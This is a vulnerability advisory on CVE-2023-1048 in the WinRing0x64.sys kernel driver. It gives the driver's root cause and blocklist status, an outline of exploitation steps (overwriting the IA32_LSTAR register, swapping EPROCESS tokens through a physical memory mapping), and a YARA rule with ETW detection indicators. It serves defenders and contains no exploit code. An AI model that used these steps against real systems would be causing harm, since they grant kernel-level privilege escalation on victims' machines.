CVE-2023-1048
WinRing0x64 — arbitrary MSR write and physical memory R/W via IOCTL
Summary
| Field | Value |
|---|---|
| Driver | WinRing0x64.sys |
| Vendor | OpenLibSys / bundled by TechPowerUp, CPUID, Razer, LibreHardwareMonitor, and dozens of others |
| Vulnerability Class | Arbitrary R/W / MSR Write / Physical Memory Mapping |
| Abused Version | 1.2.0.5 and earlier (all known versions) |
| Status | Blocklisted — Microsoft classifies as VulnerableDriver:WinNT/Winring0 (variants A–G) |
| Exploited ITW | Yes |
BYOVD Context
- Driver signing: Authenticode-signed; multiple signed variants exist from different bundling vendors (CPUID, Razer, Noriyuki Miyazaki)
- Vulnerable Driver Blocklist: Included — Microsoft classifies multiple hash variants as
VulnerableDriver:WinNT/Winring0.Athrough.G - HVCI behavior: Blocked on HVCI-enabled systems via the blocklist
- KDU integration: Not directly integrated, but the WinRing0 library is used by many open-source hardware tools
- LOLDrivers: Listed at loldrivers.io with multiple hash variants
Affected IOCTLs
- Arbitrary MSR write (WRMSR) with user-controlled register index and value
- Arbitrary MSR read (RDMSR)
- Physical memory read via MmMapIoSpace
- Physical memory write via MmMapIoSpace
- I/O port read/write (IN/OUT)
- PCI configuration space access
Root Cause
WinRing0x64.sys is an open-source kernel driver from the OpenLibSys project, designed to provide user-mode applications with direct access to hardware registers, physical memory, MSRs, I/O ports, and PCI configuration space. It is bundled by a vast number of hardware monitoring and tuning applications — TechPowerUp RealTemp, CPUID HWMonitor, Razer Synapse 3, LibreHardwareMonitor, FanControl, and many others.
The driver creates its device object with permissive ACLs and exposes IOCTLs for all of the above hardware access primitives without any caller validation. Every IOCTL accepts user-controlled parameters (physical address, MSR index, port number) and performs the operation directly. This is by design — the driver was created to give hardware tools full access — but the complete absence of access control means any process on the system can exploit these capabilities.
CVE-2023-1048 specifically documents the vulnerability as present in TechPowerUp Ryzen DRAM Calculator v1.7.3 (WinRing0x64.sys v1.2.0.5), but the same driver binary is bundled with dozens of applications. CVE-2023-1047 covers the same driver bundled with TechPowerUp RealTemp.
The widespread distribution of WinRing0 makes it one of the most commonly encountered BYOVD drivers. In early 2025, Windows Defender began flagging WinRing0 in consumer tools like Razer Synapse and FanControl, prompting vendors to update or remove the driver.
Exploitation
The MSR write IOCTL is the most dangerous primitive. The standard exploitation via MSR:
- Load
WinRing0x64.sys(or find it already present from a hardware monitoring tool) - Open a handle to the device
- Use the WRMSR IOCTL to write to
IA32_LSTAR(MSR 0xC0000082), which holds the kernel syscall entry point address - Redirect syscall dispatch to attacker-controlled code
- Execute arbitrary code in ring 0 on the next syscall
Alternatively, the physical memory R/W IOCTLs allow the standard page-table-walk approach:
- Map physical memory pages via the MmMapIoSpace IOCTL
- Walk the page table hierarchy to locate kernel structures
- Overwrite EPROCESS tokens for SYSTEM privilege escalation
The zeze-zeze/WindowsKernelVuln repository provides PoC code demonstrating both MSR-based kernel execution and physical memory access.
Detection
YARA Rule
rule CVE_2023_1048_WinRing0x64 {
meta:
description = "Detects WinRing0x64.sys vulnerable driver"
cve = "CVE-2023-1048"
author = "KernelSight"
severity = "critical"
strings:
$mz = { 4D 5A }
$driver_name = "WinRing0" wide ascii nocase
$openlib = "OpenLibSys" wide ascii
$device = "\\Device\\WinRing0" wide ascii
condition:
$mz at 0 and ($driver_name or $openlib or $device)
}
ETW Indicators
| Provider | Event / Signal | Relevance |
|---|---|---|
| Microsoft-Windows-Kernel-File | Driver load event | Detects loading of WinRing0x64.sys from non-standard paths |
| Sysmon | Event ID 6 — Driver loaded | Hash and signature capture; Windows Defender also flags as VulnerableDriver:WinNT/Winring0 |
| Microsoft-Windows-Security-Auditing | Event 4697 — Service installed | Service creation for WinRing0 driver |
| Microsoft-Windows-Kernel-Process | Process token modification | Post-exploitation token swap |
Behavioral Indicators
- Loading of
WinRing0x64.sysfrom a temporary directory or user-writable path (not from a known hardware tool installation) - WRMSR IOCTLs targeting
IA32_LSTAR(0xC0000082) or other security-critical MSRs from non-hardware-monitoring processes - Physical memory mapping IOCTLs spanning kernel address ranges from unknown processes
- Windows Defender alert for
VulnerableDriver:WinNT/Winring0variants - Privilege escalation following WinRing0 driver interaction from a process that is not a known hardware utility